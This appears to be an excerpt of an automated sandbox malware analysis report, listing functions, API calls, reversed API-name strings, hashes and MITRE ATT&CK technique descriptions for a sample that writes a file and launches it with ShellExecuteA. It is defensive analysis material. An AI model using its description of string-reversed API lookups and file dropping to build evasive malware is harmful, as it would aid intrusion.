sserddAcorPteG, xrefs: 02DB828F

Memory Dump Source

Source File: 00000016.00000002.2320707218.0000000002DA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DA1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_2da1000_Wisrysxl.jbxd

Similarity

API ID: AddressProc
String ID: Kernel32$sserddAcorPteG
API String ID: 190572456-1372893251
Opcode ID: 92e392bca40b099e883badb86bc41b2e9722b7744498efaf390b2f99540b5504
Instruction ID: 12338e7879b6ef4f2fc54d9c11aea8950ab95a0fe36805b0eb24b0d4546e75a8
Opcode Fuzzy Hash: 92e392bca40b099e883badb86bc41b2e9722b7744498efaf390b2f99540b5504
Instruction Fuzzy Hash: FC018475680344EFEB01EFA4EC61E9AB7EEEB48B00F514460A802D7740DA70AD44CA74

Function 02DB81CC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36COMMON

Download Yara Rule

APIs

Part of subcall function 02DB8274: GetProcAddress.KERNEL32(?,?), ref: 02DB82D9

GetModuleHandleA.KERNELBASE(?), ref: 02DB821E

Strings

KernelBASE, xrefs: 02DB8205
AeldnaHeludoMteG, xrefs: 02DB81E5

Memory Dump Source

Source File: 00000016.00000002.2320707218.0000000002DA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DA1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_2da1000_Wisrysxl.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: AeldnaHeludoMteG$KernelBASE
API String ID: 1646373207-1952140341
Opcode ID: 38ba21dc4975dfc6ea8ed4bbc7a9f9a46a9fa0eb304bb288926c200892fa704c
Instruction ID: 094612f68cb1e84a21b1268938f4634e3444d3079e1de30dd127d3550e1b0d97
Opcode Fuzzy Hash: 38ba21dc4975dfc6ea8ed4bbc7a9f9a46a9fa0eb304bb288926c200892fa704c
Instruction Fuzzy Hash: 55F06271E84704EFEB12EBA5ED31D99B7EDEB4A700B918860E802C3710D670AE149A74

Analysis Process: lxsyrsiW.pifPID: 6048, Parent PID: 2944COMMON

Execution Graph

Execution Coverage:	27.8%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	32
Total number of Limit Nodes:	2

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 0040108C Relevance: 28.2, APIs: 15, Strings: 1, Instructions: 207
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 004010A6
memset.MSVCRT ref: 004010EE
strcmp.MSVCRT ref: 00401180
strcpy.MSVCRT(?,00000000), ref: 004011CE
EntryPoint.LXSYRSIW(?,?), ref: 004011BE

Part of subcall function 00401000: malloc.MSVCRT ref: 0040100F

EntryPoint.LXSYRSIW(?,?), ref: 00401202
getenv.MSVCRT ref: 0040120B
EntryPoint.LXSYRSIW(?,?), ref: 00401246
sprintf.MSVCRT ref: 00401263
fopen.MSVCRT ref: 00401278
EntryPoint.LXSYRSIW(?,?), ref: 004012B3
fwrite.MSVCRT ref: 004012DD
fclose.MSVCRT ref: 004012EC
EntryPoint.LXSYRSIW(00477C65,00000004), ref: 0040131C
ShellExecuteA.SHELL32(00000000,00000000,?,0000000A,0000000A,0000000A), ref: 00401344

Strings

%s\%s, xrefs: 00401256, 0040125B

Memory Dump Source

Source File: 00000017.00000001.2303257713.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000001.2303257713.0000000000479000.00000040.00000001.00020000.00000000.sdmpDownload File
Associated: 00000017.00000001.2303257713.000000000058C000.00000040.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_1_400000_lxsyrsiW.jbxd

Similarity

API ID: EntryPoint$memset$ExecuteShellfclosefopenfwritegetenvmallocsprintfstrcmpstrcpy
String ID: %s\%s
API String ID: 2742963760-4073750446
Opcode ID: f7caa40db87bd64da8a9641d8fb3409a5fd547f57c718ebec707670eae309403
Instruction ID: 7e0938a0f735226449982c757e1a15bee8303af7c1bff0ef3dea70518ca31291
Opcode Fuzzy Hash: f7caa40db87bd64da8a9641d8fb3409a5fd547f57c718ebec707670eae309403
Instruction Fuzzy Hash: 9971F4F1E001049BDB54DB9CDC81B9E77B9DB48309F04417AF60AFB391E639AA448B59

Function 00401155 Relevance: 13.6, APIs: 9, Instructions: 113
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

strcmp.MSVCRT ref: 00401180
strcpy.MSVCRT(?,00000000), ref: 004011CE
EntryPoint.LXSYRSIW(?,?), ref: 004011BE

Part of subcall function 00401000: malloc.MSVCRT ref: 0040100F

EntryPoint.LXSYRSIW(?,?), ref: 00401202
getenv.MSVCRT ref: 0040120B
EntryPoint.LXSYRSIW(?,?), ref: 00401246
sprintf.MSVCRT ref: 00401263
fopen.MSVCRT ref: 00401278
EntryPoint.LXSYRSIW(?,?), ref: 004012B3
fwrite.MSVCRT ref: 004012DD
fclose.MSVCRT ref: 004012EC
EntryPoint.LXSYRSIW(00477C65,00000004), ref: 0040131C
ShellExecuteA.SHELL32(00000000,00000000,?,0000000A,0000000A,0000000A), ref: 00401344

Memory Dump Source

Source File: 00000017.00000001.2303257713.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000001.2303257713.0000000000479000.00000040.00000001.00020000.00000000.sdmpDownload File
Associated: 00000017.00000001.2303257713.000000000058C000.00000040.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_1_400000_lxsyrsiW.jbxd

Similarity

API ID: EntryPoint$ExecuteShellfclosefopenfwritegetenvmallocsprintfstrcmpstrcpy
String ID:
API String ID: 2992075992-0
Opcode ID: 9d440d4ec79179d813846289a69e97d5325691e0c2bdd9780b26e9bc1f5c1949
Instruction ID: da6ba3fb88c20024e61c29d0d1421e634aa01f37861d58f563f893074dd25450
Opcode Fuzzy Hash: 9d440d4ec79179d813846289a69e97d5325691e0c2bdd9780b26e9bc1f5c1949
Instruction Fuzzy Hash: F54135F0E101049BDB58DB58DC91B9D77B9DB44309F0441BAF60AFB391E63CAA88CB59

Function 00401475 Relevance: 7.6, APIs: 5, Instructions: 57
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 0040148F
__set_app_type.MSVCRT ref: 004014A8
_controlfp.MSVCRT ref: 004014BC
__getmainargs.MSVCRT ref: 004014EA
exit.MSVCRT ref: 0040151C

Memory Dump Source

Source File: 00000017.00000001.2303257713.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000001.2303257713.0000000000479000.00000040.00000001.00020000.00000000.sdmpDownload File
Associated: 00000017.00000001.2303257713.000000000058C000.00000040.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_1_400000_lxsyrsiW.jbxd

Similarity

API ID: __getmainargs__set_app_type_controlfpexitmemset
String ID:
API String ID: 1611591150-0
Opcode ID: 3e9f39bb6ffd838578539124f816f781f8a913f6e0aece3818f3f62b9f724f52
Instruction ID: 9bdd3bf799432f41f787d58fcaaf5403f241b1bf87296188f28308fcf3b5ab6f
Opcode Fuzzy Hash: 3e9f39bb6ffd838578539124f816f781f8a913f6e0aece3818f3f62b9f724f52
Instruction Fuzzy Hash: CA110CF5E00104AFCB01EBB8EC85F4A77ACA74C304F50447AB909E7361E979EA448769

Function 00401000 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 50
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

malloc.MSVCRT ref: 0040100F

Strings

j+s9ha:h4p,hw@i*w-.twyn9k7[kazbv, xrefs: 0040106E

Memory Dump Source

Source File: 00000017.00000001.2303257713.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000001.2303257713.0000000000479000.00000040.00000001.00020000.00000000.sdmpDownload File
Associated: 00000017.00000001.2303257713.000000000058C000.00000040.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_1_400000_lxsyrsiW.jbxd

Similarity

API ID: malloc
String ID: j+s9ha:h4p,hw@i*w-.twyn9k7[kazbv
API String ID: 2803490479-2443507578
Opcode ID: 9b87e1f0081ca89dfff0da140871b25e0bf5e5df9078889f7e82ab436f17736e
Instruction ID: 9430970044b5224a9c12c246655217461080a0914b4116f12426152c687b188d
Opcode Fuzzy Hash: 9b87e1f0081ca89dfff0da140871b25e0bf5e5df9078889f7e82ab436f17736e
Instruction Fuzzy Hash: 1B110CB0A05248EFCB04CFACD4907ADBBF1EF49304F1480AAE856E7391D635AE41DB45

Function 004013FF Relevance: 2.5, Strings: 2, Instructions: 30
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

D`:vD`:v, xrefs: 00401411, 00401414
D`:vD`:v, xrefs: 00401438, 0040143D

Memory Dump Source

Source File: 00000017.00000001.2303257713.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000001.2303257713.0000000000479000.00000040.00000001.00020000.00000000.sdmpDownload File
Associated: 00000017.00000001.2303257713.000000000058C000.00000040.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_1_400000_lxsyrsiW.jbxd

Similarity

API ID: memset$EntryPointfopenstrcmpstrcpy
String ID: D`:vD`:v$D`:vD`:v
API String ID: 4108700736-3916433284
Opcode ID: 8a31f6e7c9d8c4b79f68c5e1b4c980db31f3675092d636c129533732d18511af
Instruction ID: 7b5742814f41c47d4244d2c3f0283e0289412fe64b87ae5b76c2526650b71fed
Opcode Fuzzy Hash: 8a31f6e7c9d8c4b79f68c5e1b4c980db31f3675092d636c129533732d18511af
Instruction Fuzzy Hash: 4BF074B5A04248AFCB40EFB9D981D8A77F8BB4C304B5044B6F948D7351E674EA448B58

Analysis Process: neworigin.exePID: 2164, Parent PID: 6048COMMON

Execution Graph

Execution Coverage:	13.8%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0.7%
Total number of Nodes:	405
Total number of Limit Nodes:	54

Executed Functions

Function 06412360 Relevance: 9.0, Strings: 6, Instructions: 1531COMMON

Download Yara Rule

Strings

$]q, xrefs: 064138D0
$]q, xrefs: 06413877
$]q, xrefs: 064138A0
$]q, xrefs: 06413883
$]q, xrefs: 064138C4
$]q, xrefs: 064138AC

Memory Dump Source

Source File: 00000018.00000002.4588748090.0000000006410000.00000040.00000800.00020000.00000000.sdmp, Offset: 06410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_6410000_neworigin.jbxd

Similarity

API ID:
String ID: $]q$$]q$$]q$$]q$$]q$$]q
API String ID: 0-3723351465
Opcode ID: 49137f2f6683687c4b633c8596097806277e714613eb59f35dba28d50e5612f1
Instruction ID: 0cf581e8300dc628700752c7f3c467ad2979685dc9bbd00268072df5081c508e
Opcode Fuzzy Hash: 49137f2f6683687c4b633c8596097806277e714613eb59f35dba28d50e5612f1
Instruction Fuzzy Hash: AAE23834A002098FDB65DF68C594A9EB7F2FF89310F5485AAD409EB365EB70ED85CB40

Function 0641B338 Relevance: 8.3, Strings: 6, Instructions: 781COMMON

Download Yara Rule

Strings

$]q, xrefs: 0641BD21
$]q, xrefs: 0641BCC5
$]q, xrefs: 0641BCB9
$]q, xrefs: 0641BCED
$]q, xrefs: 0641BCF9
$]q, xrefs: 0641BD2D

Memory Dump Source

Source File: 00000018.00000002.4588748090.0000000006410000.00000040.00000800.00020000.00000000.sdmp, Offset: 06410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_6410000_neworigin.jbxd

Similarity

API ID:
String ID: $]q$$]q$$]q$$]q$$]q$$]q
API String ID: 0-3723351465
Opcode ID: ca3e9b67e4acd010e057fd46a6935a7639b6c5482b8f93ffc0315074e4a95b07
Instruction ID: 818a0abffa4dedadc6c6b71cb2a8af1c367e6ad09be7bcd182f8d9b6b6f22f71
Opcode Fuzzy Hash: ca3e9b67e4acd010e057fd46a6935a7639b6c5482b8f93ffc0315074e4a95b07
Instruction Fuzzy Hash: AE524A70E102098FDF65DB68D5907AEB7B2EB49310F24896BE449DF391DB34D882CB91

Function 06417E78 Relevance: 3.0, Strings: 2, Instructions: 473
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$]q, xrefs: 06418413
$]q, xrefs: 0641841F

Memory Dump Source

Source File: 00000018.00000002.4588748090.0000000006410000.00000040.00000800.00020000.00000000.sdmp, Offset: 06410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_6410000_neworigin.jbxd

Similarity

API ID:
String ID: $]q$$]q
API String ID: 0-127220927
Opcode ID: 19bfcac355cdc85858926508a5bca2be4ec56c19929b753c9275ce6761aa053c
Instruction ID: 0c2398007df24fd1037549e0e2ee6cf138807dfdd4035de0cd06d92f4359690d
Opcode Fuzzy Hash: 19bfcac355cdc85858926508a5bca2be4ec56c19929b753c9275ce6761aa053c
Instruction Fuzzy Hash: 4B028F31B002098FDB55DB68D594AAEB7E2FF84314F24896AE8159F354DB35EC82CB81

Function 064166E8 Relevance: .8, Instructions: 821COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000018.00000002.4588748090.0000000006410000.00000040.00000800.00020000.00000000.sdmp, Offset: 06410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_6410000_neworigin.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 539e4a89b7d0e03523a2968a9ec4b96d85bad1642f0ec267d3f4562efa8cdf14
Instruction ID: 069047ba1e6a2d13c5b31e09ee5c58121d21cefb897d8dc0b0c283d738a0fc8c
Opcode Fuzzy Hash: 539e4a89b7d0e03523a2968a9ec4b96d85bad1642f0ec267d3f4562efa8cdf14
Instruction Fuzzy Hash: 4662AD34B002058FDB55DB68D594AAEBBF2EF85314F25846AE809EF350DB35ED46CB80

Function 0641C2A0 Relevance: .6, Instructions: 633COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000018.00000002.4588748090.0000000006410000.00000040.00000800.00020000.00000000.sdmp, Offset: 06410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_6410000_neworigin.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 057a6a04eb981a289d124c82ee69400fa5469581c06b3e471da1cf85dda05abe
Instruction ID: bdc9294b8f03f332cecd613cd3208b326d2b8217a3dc0e73441a3e4af153f627
Opcode Fuzzy Hash: 057a6a04eb981a289d124c82ee69400fa5469581c06b3e471da1cf85dda05abe
Instruction Fuzzy Hash: 79329234B102098FDF55DB68D890BAEB7B2FB88314F24856AE405DB355DB39EC42CB91

Function 064156B8 Relevance: .6, Instructions: 590COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000018.00000002.4588748090.0000000006410000.00000040.00000800.00020000.00000000.sdmp, Offset: 06410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_6410000_neworigin.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c55a2147f4a8b0df35ea5f829b22522828c123597e8ee968727821e63930bff7
Instruction ID: 2af95d4ff24974d6fc81c00d4e201d9e23dac4979f84e84f66efce5b6cb68c7d
Opcode Fuzzy Hash: c55a2147f4a8b0df35ea5f829b22522828c123597e8ee968727821e63930bff7
Instruction Fuzzy Hash: AE22C1B1F102059FDB69DF64C8946AEB7B2EF84310F24886AE4599F385DB34DC42CB91

Function 06419250 Relevance: 5.2, Strings: 4, Instructions: 230
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$]q, xrefs: 064192A3
$]q, xrefs: 06419297
$]q, xrefs: 064192D2
$]q, xrefs: 064192DE

Memory Dump Source

Source File: 00000018.00000002.4588748090.0000000006410000.00000040.00000800.00020000.00000000.sdmp, Offset: 06410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_6410000_neworigin.jbxd

Similarity

API ID:
String ID: $]q$$]q$$]q$$]q
API String ID: 0-858218434
Opcode ID: 45edaae753f0b286bb379c259250f7046904b596231f6b599009337688b0b03f
Instruction ID: ee2ce68f398ba212921febe1293b0c11290e826b68582fbd0a983c83f535ff74
Opcode Fuzzy Hash: 45edaae753f0b286bb379c259250f7046904b596231f6b599009337688b0b03f
Instruction Fuzzy Hash: 9E914330B0061A9FDB55EF69D860BAF73F2BF85204F208566D809EB344EF709D468B91

Function 06419241 Relevance: 2.7, Strings: 2, Instructions: 160
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$]q, xrefs: 06419297
$]q, xrefs: 064192D2

Memory Dump Source

Source File: 00000018.00000002.4588748090.0000000006410000.00000040.00000800.00020000.00000000.sdmp, Offset: 06410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_6410000_neworigin.jbxd

Similarity

API ID:
String ID: $]q$$]q
API String ID: 0-127220927
Opcode ID: 6a29a38b5106b3d72910dd91537bd4044eeabd3a660c1110b9f1e7881d670e14
Instruction ID: dbe83b7975ef4f336090614524995b23211810cf7dc4102d9cf547c238350668
Opcode Fuzzy Hash: 6a29a38b5106b3d72910dd91537bd4044eeabd3a660c1110b9f1e7881d670e14
Instruction Fuzzy Hash: 08513031B005069FDB55EB78D960BAE77F6EF88644F20856AD809DB394EA309C42CB91

Function 0641B32B Relevance: .3, Instructions: 298COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000018.00000002.4588748090.0000000006410000.00000040.00000800.00020000.00000000.sdmp, Offset: 06410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_6410000_neworigin.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 232cfc705d14c977b432b5cc2b6e19207b5555552947bb0cc08fafcf769f49ef
Instruction ID: dba1daaac11b247192adbad0e6cdde73aca8c73267d9f440ea13ac8fa6993464
Opcode Fuzzy Hash: 232cfc705d14c977b432b5cc2b6e19207b5555552947bb0cc08fafcf769f49ef
Instruction Fuzzy Hash: 20B18374F101098FEF65DB68D5947AFB7B6EB89310F21842AE409EB391CB34DC828752

Function 064162E8 Relevance: .2, Instructions: 229COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000018.00000002.4588748090.0000000006410000.00000040.00000800.00020000.00000000.sdmp, Offset: 06410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_6410000_neworigin.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 68f2b991f571df95e4e5829f2542e615438379e468c4678aab29639d51a0d1e1
Instruction ID: 5eb5631138a9afbdef7534a397251e4008a724527d12fbe69595a5607169fdea
Opcode Fuzzy Hash: 68f2b991f571df95e4e5829f2542e615438379e468c4678aab29639d51a0d1e1
Instruction Fuzzy Hash: 2861BF71F000214FDF55AA6AC88066FBADBAFD4220B25447AE80EDB364DE75DD0287D1

Function 064146D8 Relevance: .2, Instructions: 222COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000018.00000002.4588748090.0000000006410000.00000040.00000800.00020000.00000000.sdmp, Offset: 06410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_6410000_neworigin.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3da88654f7c4458b3bedb2a48d2c946c927fe9ead925a2decdf778f4158073bd
Instruction ID: b959bec86c937c5b140e14703e5dad94132122248ca57c5b09730db9b8dc2abe
Opcode Fuzzy Hash: 3da88654f7c4458b3bedb2a48d2c946c927fe9ead925a2decdf778f4158073bd
Instruction Fuzzy Hash: C1913E34E102198BDF61DF64C890BDEB7B1FF89300F208596D549AB395DB70AA85CF91

Function 064146F0 Relevance: .2, Instructions: 210COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000018.00000002.4588748090.0000000006410000.00000040.00000800.00020000.00000000.sdmp, Offset: 06410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_6410000_neworigin.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a6f529dd1b68511dd3b6edf17616f7bc3661cd09b8ff522431147d3c62857869
Instruction ID: a3358e297266978e35cdd01048430f9536e0dd00ae173a73a5fafc0729ea9413
Opcode Fuzzy Hash: a6f529dd1b68511dd3b6edf17616f7bc3661cd09b8ff522431147d3c62857869
Instruction Fuzzy Hash: 87912D34E102198BDF60DF64C890B9DB7B1FF89310F208596D549BB355DB70AA85CF51

Function 0641FB58 Relevance: .2, Instructions: 172COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000018.00000002.4588748090.0000000006410000.00000040.00000800.00020000.00000000.sdmp, Offset: 06410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_6410000_neworigin.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e45158a20ab10337e07086f4413c184c0c1f2c41091eff8de6c7628612b59ac
Instruction ID: 20d9cd39a530470e46f6ee234afa34efcdc33e99f7fad986375dc4ffddf0a4e3
Opcode Fuzzy Hash: 3e45158a20ab10337e07086f4413c184c0c1f2c41091eff8de6c7628612b59ac
Instruction Fuzzy Hash: 34510B74B202054BEFA66B6CD85477F2B9AE78D310F20442BE50BCB3D5CA69CC579392

Function 0641FB68 Relevance: .2, Instructions: 163COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000018.00000002.4588748090.0000000006410000.00000040.00000800.00020000.00000000.sdmp, Offset: 06410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_6410000_neworigin.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 423f9c9e80bf378bef52296ad796e18112067f08a31c3d28f2560e74bb0fddac
Instruction ID: 3f27b2c5df80135b2535c29b89e4fc2110cfb244c500ad6cdd94ced4a6ad938e
Opcode Fuzzy Hash: 423f9c9e80bf378bef52296ad796e18112067f08a31c3d28f2560e74bb0fddac
Instruction Fuzzy Hash: 4851EB74B201058BEFA66BACD85473F269AE78D350F20442BE50BCB3D4CA69CC565392

Function 0641F2C1 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000018.00000002.4588748090.0000000006410000.00000040.00000800.00020000.00000000.sdmp, Offset: 06410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_6410000_neworigin.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6ddff90816e3b0b240748f9c040af2e43d7078c6646aa410a040a613dc235bdf
Instruction ID: fb376cd8b8efb97e4479e721f19f9c66440eb298d2982a17c9a3624fa4798399
Opcode Fuzzy Hash: 6ddff90816e3b0b240748f9c040af2e43d7078c6646aa410a040a613dc235bdf
Instruction Fuzzy Hash: 8A01F132B004140BCB9A9AFCC854B6F77D6DBCA310B14442AE40ACF390DA25DD0B83A2

Function 0641431B Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000018.00000002.4588748090.0000000006410000.00000040.00000800.00020000.00000000.sdmp, Offset: 06410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_6410000_neworigin.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6d39e5116bd089b5ee3b67e84cefb2ac01982e4143d7351e7c4d1812e315cb5d
Instruction ID: c439d960c427e77e6deae31fa9b3275778989386879ec33209910810a3efca7e
Opcode Fuzzy Hash: 6d39e5116bd089b5ee3b67e84cefb2ac01982e4143d7351e7c4d1812e315cb5d
Instruction Fuzzy Hash: C101B135B101140BDB5696BCC41976FA7E6CBC6711F25883BE44DCB795DD24DC0383A2

Function 06414328 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000018.00000002.4588748090.0000000006410000.00000040.00000800.00020000.00000000.sdmp, Offset: 06410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_6410000_neworigin.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e331858fc03764f69c6da35899dbd656759a673fcba62a1dd4207e13c54d29bb
Instruction ID: df17fafadb705734d4b725fef5a437db211017c4b289bb8ba5d8c4ff38d718b3
Opcode Fuzzy Hash: e331858fc03764f69c6da35899dbd656759a673fcba62a1dd4207e13c54d29bb
Instruction Fuzzy Hash: 79018131B100180BDB6696ADD41972FA7EACBCA725F24883BF50ECB794ED65DC0343A1

Function 0641F2D0 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000018.00000002.4588748090.0000000006410000.00000040.00000800.00020000.00000000.sdmp, Offset: 06410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_6410000_neworigin.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eaed6d95e3127a636c0a3b9806353de442acab72aa65495884867fce77306694
Instruction ID: 556364f04f3b1b435e7a63f82e3f51c92d4e8f11331916fa8c7f243c014e8c63
Opcode Fuzzy Hash: eaed6d95e3127a636c0a3b9806353de442acab72aa65495884867fce77306694
Instruction Fuzzy Hash: EE01FF32B104140BDBAA9ABDD494B6F77D6DBCA720F24883AF50ACB340DE25DC074386

Function 0641FF18 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000018.00000002.4588748090.0000000006410000.00000040.00000800.00020000.00000000.sdmp, Offset: 06410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_6410000_neworigin.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 45cac9ae1c5c5763688eaa44d04273bc4c12aa39bad5b7ec48d48bf8510244f6
Instruction ID: e124179e2d6e7008202cf97023470eb3ad926a551e2ce7eb46ab778cb3507c33
Opcode Fuzzy Hash: 45cac9ae1c5c5763688eaa44d04273bc4c12aa39bad5b7ec48d48bf8510244f6
Instruction Fuzzy Hash: 94F0622031D2A04FD785AB398864A593FB69F86600F1540FFE059CB7E3CD65DC098B91

Function 0641FF30 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000018.00000002.4588748090.0000000006410000.00000040.00000800.00020000.00000000.sdmp, Offset: 06410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_6410000_neworigin.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b79e46b1fc2f64171f5ba6d984add0984fb62d12fda174a3264f307ab5978bdd
Instruction ID: 17ce040508b0984f649a8143c69ee0d2ce6e42f5ac3115b906e63091857cca15
Opcode Fuzzy Hash: b79e46b1fc2f64171f5ba6d984add0984fb62d12fda174a3264f307ab5978bdd
Instruction Fuzzy Hash: E4E065303100204BD7C8A769C824B5D3BA69FC8A00F0080BEA519CB3E1CDB5DC054BC4

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute malicious payloads via loading shared modules. Shared modules are executable files that are loaded into processes to provide access to reusable code, such as specific custom functions or invoking OS API functions (i.e., Native API ).
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

